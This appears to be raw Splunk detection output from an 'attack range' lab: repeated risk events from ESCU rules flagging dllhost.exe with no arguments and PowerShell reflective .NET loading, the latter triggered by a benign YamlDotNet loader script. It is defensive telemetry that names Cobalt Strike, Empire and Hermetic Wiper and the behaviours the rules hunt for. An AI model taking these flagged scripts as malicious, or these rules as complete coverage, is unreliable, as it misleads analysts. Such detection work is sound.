process="C:\\Windows\\System32\\dllhost.exe", process_id="0xbd4", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664952932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T05:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T05:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664952932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T05:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T05:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664952932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T05:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T05:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664952932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T05:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T05:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664946000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664946000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="2128", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664946000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664946000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x850", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664949332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T04:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T04:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664949332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T04:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T04:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664949332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T04:16:30", info_max_time="+Infinity", info_min_time="0.000", 